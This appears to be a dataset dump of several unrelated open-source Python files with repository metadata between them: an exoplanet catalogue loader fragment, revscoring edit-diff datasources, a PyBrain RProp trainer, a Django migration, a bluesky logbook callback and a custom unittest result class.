parent._addChild(planet) # Add planet to the star
self.planets.append(planet) # Add planet to the index
def load_db_from_url(url="https://github.com/OpenExoplanetCatalogue/oec_gzip/raw/master/systems.xml.gz"):
""" Loads the database from a gzipped version of the system folder, by default the one located in the oec_gzip repo
in the OpenExoplanetCatalogue GitHub group.
    The database is loaded from the url into memory.
:param url: url to load (must be gzipped version of systems folder)
    :return: OECDatabase object initialised with the latest OEC version
"""
catalogue = gzip.GzipFile(fileobj=io.BytesIO(requests.get(url).content))
database = OECDatabase(catalogue, stream=True)
return database
class LoadDataBaseError(IOError):
pass
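
# Hedged usage sketch (network access and the planet name are illustrative):
#
#   database = load_db_from_url()
#   gj1214b = database.searchPlanet('gj1214b')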
|
mit
| -7,449,412,430,742,709,000 | 32.528455 | 124 | 0.602037 | false |
yafeunteun/wikipedia-spam-classifier
|
revscoring/revscoring/features/wikitext/datasources/edit.py
|
1
|
10052
|
import logging
import re
import time
from deltas import segment_matcher
from ....datasources import Datasource
from ....datasources.meta import filters
from .tokenized import TokenIsInTypes, is_uppercase_word
logger = logging.getLogger(__name__)
class Diff:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.operations = Datasource(
self._name + ".operations", _process_operations,
depends_on=[self.revision.parent.tokens,
self.revision.tokens]
)
"""
Returns a tuple that describes the difference between the parent
revision text and the current revision's text.
The tuple contains three fields:
* operations: `list` of :class:`deltas.Operation`
* A tokens: `list` of `str`
* B tokens: `list` of `str`
"""
self.segments_added = Datasource(
self._name + ".segments_added", _process_segments_added,
depends_on=[self.operations]
)
"""
Returns a list of all contiguous segments of tokens added in this
revision.
"""
self.segments_removed = Datasource(
self._name + ".segments_removed", _process_segments_removed,
depends_on=[self.operations]
)
"""
Returns a list of all contiguous segments of tokens removed in this
revision.
"""
self.tokens_added = Datasource(
self._name + ".tokens_added", _process_tokens_added,
depends_on=[self.operations]
)
"""
Constructs a :class:`revscoring.Datasource` that returns a list of all
tokens added in this revision.
"""
self.tokens_removed = Datasource(
self._name + ".tokens_removed", _process_tokens_removed,
depends_on=[self.operations]
)
"""
Constructs a :class:`revscoring.Datasource` that returns a list of all
tokens removed in this revision.
"""
self.numbers_added = self.tokens_added_in_types(
{'number'}, name=self._name + ".numbers_added"
)
"""
A list of numeric tokens added in the edit
"""
self.numbers_removed = self.tokens_removed_in_types(
{'number'}, name=self._name + ".numbers_removed"
)
"""
A list of numeric tokens removed in the edit
"""
self.whitespaces_added = self.tokens_added_in_types(
{'whitespace'}, name=self._name + ".whitespaces_added"
)
"""
A list of whitespace tokens added in the edit
"""
self.whitespaces_removed = self.tokens_removed_in_types(
{'whitespace'}, name=self._name + ".whitespaces_removed"
)
"""
A list of whitespace tokens removed in the edit
"""
self.markups_added = self.tokens_added_in_types(
{'dbrack_open', 'dbrack_close', 'brack_open', 'brack_close',
'tab_open', 'tab_close', 'dcurly_open', 'dcurly_close',
'curly_open', 'curly_close', 'bold', 'italics', 'equals'},
name=self._name + ".markups_added"
)
"""
A list of markup tokens added in the edit
"""
self.markups_removed = self.tokens_removed_in_types(
{'dbrack_open', 'dbrack_close', 'brack_open', 'brack_close',
'tab_open', 'tab_close', 'dcurly_open', 'dcurly_close',
'curly_open', 'curly_close', 'bold', 'italics', 'equals'},
name=self._name + ".markups_removed"
)
"""
A list of markup tokens removed in the edit
"""
self.cjks_added = self.tokens_added_in_types(
{'cjk'}, name=self._name + ".cjks_added"
)
"""
A list of Chinese/Japanese/Korean tokens added in the edit
"""
self.cjks_removed = self.tokens_removed_in_types(
{'cjk'}, name=self._name + ".cjks_removed"
)
"""
A list of Chinese/Japanese/Korean tokens removed in the edit
"""
self.entities_added = self.tokens_added_in_types(
{'entity'}, name=self._name + ".entities_added"
)
"""
A list of HTML entity tokens added in the edit
"""
self.entities_removed = self.tokens_removed_in_types(
{'entity'}, name=self._name + ".entities_removed"
)
"""
A list of HTML entity tokens removed in the edit
"""
self.urls_added = self.tokens_added_in_types(
{'url'}, name=self._name + ".urls_added"
)
"""
        A list of URL tokens added in the edit
"""
self.urls_removed = self.tokens_removed_in_types(
{'url'}, name=self._name + ".urls_removed"
)
"""
        A list of URL tokens removed in the edit
"""
self.words_added = self.tokens_added_in_types(
{'word'}, name=self._name + ".words_added"
)
"""
A list of word tokens added in the edit
"""
self.words_removed = self.tokens_removed_in_types(
{'word'}, name=self._name + ".words_removed"
)
"""
A list of word tokens removed in the edit
"""
self.uppercase_words_added = filters.filter(
is_uppercase_word, self.words_added,
name=self._name + ".uppercase_words_added"
)
"""
A list of fully UPPERCASE word tokens added in the edit
"""
self.uppercase_words_removed = filters.filter(
is_uppercase_word, self.words_removed,
name=self._name + ".uppercase_words_removed"
)
"""
A list of fully UPPERCASE word tokens removed in the edit
"""
self.punctuations_added = self.tokens_added_in_types(
{'period', 'qmark', 'epoint', 'comma', 'colon', 'scolon',
'japan_punct'},
name=self._name + ".punctuations_added"
)
"""
A list of punctuation tokens added in the edit
"""
self.punctuations_removed = self.tokens_removed_in_types(
{'period', 'qmark', 'epoint', 'comma', 'colon', 'scolon',
'japan_punct'},
name=self._name + ".punctuations_removed"
)
"""
A list of punctuation tokens removed in the edit
"""
self.breaks_added = self.tokens_added_in_types(
{'break'},
name=self._name + ".breaks_added"
)
"""
A list of break tokens added in the edit
"""
self.breaks_removed = self.tokens_removed_in_types(
{'break'},
name=self._name + ".breaks_removed"
)
"""
A list of break tokens removed in the edit
"""
def tokens_added_matching(self, regex, name=None, regex_flags=re.I):
"""
Constructs a :class:`revscoring.Datasource` that represents tokens
added that match a regular expression.
"""
if not hasattr(regex, "pattern"):
regex = re.compile(regex, regex_flags)
if name is None:
name = "{0}({1})".format(self._name + ".tokens_added_matching",
regex.pattern)
return filters.regex_matching(regex, self.tokens_added, name=name)
def tokens_removed_matching(self, regex, name=None, regex_flags=re.I):
"""
Constructs a :class:`revscoring.Datasource` that represents tokens
removed that match a regular expression.
"""
if not hasattr(regex, "pattern"):
regex = re.compile(regex, regex_flags)
if name is None:
name = "{0}({1})" \
.format(self._name + ".tokens_removed_matching",
regex.pattern)
return filters.regex_matching(regex, self.tokens_removed, name=name)
def tokens_added_in_types(self, types, name=None):
"""
Constructs a :class:`revscoring.Datasource` that represents tokens
added that are within a set of types.
"""
types = set(types)
if name is None:
name = "{0}({1})".format(self._name + ".tokens_added_in_types",
types)
return filters.filter(TokenIsInTypes(types).filter, self.tokens_added,
name=name)
def tokens_removed_in_types(self, types, name=None):
"""
Constructs a :class:`revscoring.Datasource` that represents tokens
removed that are within a set of types.
"""
types = set(types)
if name is None:
name = "{0}({1})".format(self._name + ".tokens_removed_in_types",
types)
return filters.filter(TokenIsInTypes(types).filter,
self.tokens_removed, name=name)
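
# Hedged usage sketch (`diff` stands for an initialised Diff instance; the
# regular expression is illustrative):
#
#   curse_tokens = diff.tokens_added_matching(r'\b(bad|words)\b')
#   numbers = diff.tokens_added_in_types({'number'})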
def _process_operations(a, b):
start = time.time()
operations = [op for op in segment_matcher.diff(a, b)]
logger.debug("diff() of {0} and {1} tokens took {2} seconds."
.format(len(a), len(b), time.time() - start))
return operations, a, b
def _process_segments_added(diff_operations):
operations, a, b = diff_operations
return ["".join(b[op.b1:op.b2])
for op in operations
if op.name == "insert"]
def _process_segments_removed(revision_diff):
operations, a, b = revision_diff
return ["".join(a[op.a1:op.a2])
for op in operations
if op.name == "delete"]
def _process_tokens_removed(diff_operations):
operations, a, b = diff_operations
return [t for op in operations
if op.name == "delete"
for t in a[op.a1:op.a2]]
def _process_tokens_added(diff_operations):
operations, a, b = diff_operations
return [t for op in operations
if op.name == "insert"
for t in b[op.b1:op.b2]]
|
mit
| -7,961,771,865,106,505,000 | 31.217949 | 78 | 0.544369 | false |
daanwierstra/pybrain
|
pybrain/supervised/trainers/rprop.py
|
1
|
2363
|
# $Id$
__author__ = 'Martin Felder'
from scipy import sqrt
from pybrain.supervised.trainers import BackpropTrainer
class RPropMinusTrainer(BackpropTrainer):
""" Train the parameters of a module according to a supervised dataset (possibly sequential)
by RProp without weight backtracking (aka RProp-, cf. [Igel&Huesken, Neurocomputing 50, 2003])
    and without ponderation, i.e. all training samples have the same weight. """
def __init__(self, module, etaminus = 0.5, etaplus = 1.2, deltamin = 1.0e-6, deltamax = 5.0, delta0 = 0.1, **kwargs):
""" Set up training algorithm parameters, and objects associated with the trainer.
@param module: the module whose parameters should be trained.
@param etaminus: factor by which step width is decreased when overstepping (0.5)
@param etaplus: factor by which step width is increased when following gradient (1.2)
@param delta: step width for each weight
@param deltamin: minimum step width (1e-6)
@param deltamax: maximum step width (5.0)
@param delta0: initial step width (0.1)
"""
BackpropTrainer.__init__(self, module, **kwargs)
self.epoch = 0
# set descender to RPROP mode and update parameters
self.descent.rprop = True
self.descent.etaplus = etaplus
self.descent.etaminus = etaminus
self.descent.deltamin = deltamin
self.descent.deltamax = deltamax
self.descent.deltanull = delta0
self.descent.init(module.params) # reinitialize, since mode changed
def train(self):
""" Train the network for one epoch """
self.module.resetDerivatives()
errors = 0
ponderation = 0
for seq in self.ds._provideSequences():
e, p = self._calcDerivs(seq)
errors += e
ponderation += p
if self.verbose:
print "epoch %6d total error %12.5g avg weight %12.5g" % (self.epoch, errors/ponderation,
sqrt((self.module.params**2).mean()))
self.module._setParameters(self.descent(self.module.derivs - self.weightdecay*self.module.params))
self.epoch += 1
self.totalepochs += 1
return errors/ponderation
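
# Hedged usage sketch (network layout and the sample are illustrative):
#
#   from pybrain.tools.shortcuts import buildNetwork
#   from pybrain.datasets import SupervisedDataSet
#   net = buildNetwork(2, 3, 1)
#   ds = SupervisedDataSet(2, 1)
#   ds.addSample((0, 0), (0,))
#   trainer = RPropMinusTrainer(net, dataset=ds, verbose=True)
#   trainer.train()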
|
bsd-3-clause
| -2,108,311,514,443,129,300 | 44.461538 | 121 | 0.614896 | false |
matllubos/django-is-core
|
is_core/contrib/background_export/migrations/0001_initial.py
|
1
|
2183
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-08-18 18:10
from __future__ import unicode_literals
import import_string
import chamber.models.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import is_core.contrib.background_export.models
from is_core.config import settings as is_core_settings
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ExportedFile',
fields=[
('created_at', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created at')),
('changed_at', models.DateTimeField(auto_now=True, db_index=True, verbose_name='changed at')),
('slug', models.SlugField(max_length=32, primary_key=True, serialize=False, verbose_name='slug')),
('file', chamber.models.fields.FileField(
blank=True, null=True, upload_to=is_core.contrib.background_export.models.generate_filename,
verbose_name='file', storage=import_string(is_core_settings.BACKGROUND_EXPORT_STORAGE_CLASS)()
)),
('content_type',
models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='contenttypes.ContentType')),
('created_by',
models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_exported_files',
to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('downloaded_by', models.ManyToManyField(blank=True, related_name='downloaded_exported_files',
to=settings.AUTH_USER_MODEL, verbose_name='downloaded by')),
],
options={
'verbose_name': 'exported file',
'verbose_name_plural': 'exported files',
'ordering': ('-created_at',),
},
),
]
|
bsd-3-clause
| -1,149,813,004,629,702,500 | 44.479167 | 118 | 0.603298 | false |
ericdill/bluesky
|
bluesky/callbacks/olog.py
|
1
|
4145
|
from io import StringIO
TEMPLATES = {}
TEMPLATES['long'] = """
{{- start.plan_type }} ['{{ start.uid[:6] }}'] (scan num: {{ start.scan_id }})
Scan Plan
---------
{{ start.plan_type }}
{%- for k, v in start.plan_args | dictsort %}
{{ k }}: {{ v }}
{%- endfor %}
{% if 'signature' in start -%}
Call:
{{ start.signature }}
{% endif %}
Metadata
--------
{% for k, v in start.items() -%}
{%- if k not in ['plan_type', 'plan_args'] -%}{{ k }} : {{ v }}
{% endif -%}
{%- endfor -%}"""
TEMPLATES['desc'] = """
{{- start.plan_type }} ['{{ start.uid[:6] }}'] (scan num: {{ start.scan_id }})"""
TEMPLATES['call'] = """RE({{ start.plan_type }}(
{%- for k, v in start.plan_args.items() %}{%- if not loop.first %} {% endif %}{{ k }}={{ v }}
{%- if not loop.last %},
{% endif %}{% endfor %}))
"""
def logbook_cb_factory(logbook_func, desc_template=None, long_template=None):
"""Create a logbook run_start callback
The returned function is suitable for registering as
a 'start' callback on the the BlueSky run engine.
Parameters
----------
logbook_func : callable
The required signature is ::
            def logbook_func(text=None, logbooks=None, tags=None, properties=None,
attachments=None, verify=True, ensure=False):
'''
Parameters
----------
text : string
The body of the log entry.
logbooks : string or list of strings
The logbooks which to add the log entry to.
tags : string or list of strings
The tags to add to the log entry.
properties : dict of property dicts
The properties to add to the log entry
attachments : list of file like objects
The attachments to add to the log entry
verify : bool
Check that properties, tags and logbooks are in the Olog
instance.
ensure : bool
If a property, tag or logbook is not in the Olog then
create the property, tag or logbook before making the log
s entry. Seting ensure to True will set verify to False.
'''
pass
This matches the API on `SimpleOlogClient.log`
"""
import jinja2
env = jinja2.Environment()
if long_template is None:
long_template = TEMPLATES['long']
if desc_template is None:
desc_template = TEMPLATES['desc']
# It seems that the olog only has one text field, which it calls
# `text` on the python side and 'description' on the olog side.
# There are some CSS applications that try to shove the entire
# thing into a single line. We work around this by doing two
# strings, a long one which will get put in a as an attachment
# and a short one to go in as the 'text' which will be used as the
# description
long_msg = env.from_string(long_template)
desc_msg = env.from_string(desc_template)
def lbcb(name, doc):
# This only applies to 'start' Documents.
if name != 'start':
return
atch = StringIO(long_msg.render(start=doc))
desc = desc_msg.render(start=doc)
logbook_func(text=desc, properties={'start':doc},
attachments=[atch],
ensure=True)
return lbcb
def call_str(start, call_template=None):
"""Given a start document generate an evalable call scring
The default template assumes that `plan_args` and `plan_type`
are at the top level of the document.
    Parameters
    ----------
start : dict
A document which follows the runstart schema
call_template : str, optional
A jinja2 template rendered with `cr.render(start=start)`
        If not provided, defaults to `TEMPLATES['call']`
"""
import jinja2
env = jinja2.Environment()
if call_template is None:
call_template = TEMPLATES['call']
call_renderer = env.from_string(call_template)
return call_renderer.render(start=start)
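
# Hedged usage sketch (assumes a bluesky RunEngine named `RE` and pyOlog's
# SimpleOlogClient; both are illustrative of a typical setup):
#
#   from pyOlog import SimpleOlogClient
#   client = SimpleOlogClient()
#   RE.subscribe('start', logbook_cb_factory(client.log))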
|
bsd-3-clause
| -4,276,932,804,570,947,600 | 32.97541 | 95 | 0.572256 | false |
jonesambrosi/rocks
|
test_rocks/custom_report.py
|
1
|
2457
|
import logging
from unittest import TestResult
logger = logging.getLogger(__name__)
class CustomTestReport(TestResult):
def __init__(self, change_callback=None):
super(CustomTestReport, self).__init__()
logger.debug('__init__')
self.running = False
self.change_callback = change_callback
self.success = 0
def startTest(self, test):
super(CustomTestReport, self).startTest(test)
logger.debug('startTest')
self.running = True
if self.change_callback:
self.change_callback({
"errors": len(self.errors),
"failures": len(self.failures),
"skipped": len(self.skipped),
"expectedFailures": len(self.expectedFailures),
"unexpectedSuccesses": len(self.unexpectedSuccesses),
"testsRun": self.testsRun,
"success": self.success
})
def stopTest(self, test):
super(CustomTestReport, self).stopTest(test)
logger.debug("stopTest %s", test)
self.running = False
def startTestRun(self):
super(CustomTestReport, self).startTestRun()
logger.debug("startTestRun")
self.running = True
def stopTestRun(self):
super(CustomTestReport, self).stopTestRun()
logger.debug("stopTestRun")
self.running = False
def addError(self, test, err):
super(CustomTestReport, self).addError(test, err)
logger.debug("[E] %s %s", test, err)
def addFailure(self, test, err):
super(CustomTestReport, self).addFailure(test, err)
logger.debug("[F] %s %s", test, err)
def addSuccess(self, test):
super(CustomTestReport, self).addSuccess(test)
logger.debug("[S] %s", test)
self.success += 1
def addSkip(self, test, reason):
super(CustomTestReport, self).addSkip(test, reason)
logger.debug("[s] %s %s", test, reason)
def addExpectedFailure(self, test, err):
super(CustomTestReport, self).addExpectedFailure(test, err)
logger.debug("[EF] %s %s", test, err)
def addUnexpectedSuccess(self, test):
super(CustomTestReport, self).addUnexpectedSuccess(test)
logger.debug("[US] %s", test)
def addSubTest(self, test, subtest, outcome):
super(CustomTestReport, self).addSubTest(test, subtest, outcome)
logger.debug("[ST] %s %s %s", test, subtest, outcome)
|
mit
| 3,235,002,747,849,012,000 | 32.657534 | 72 | 0.611315 | false |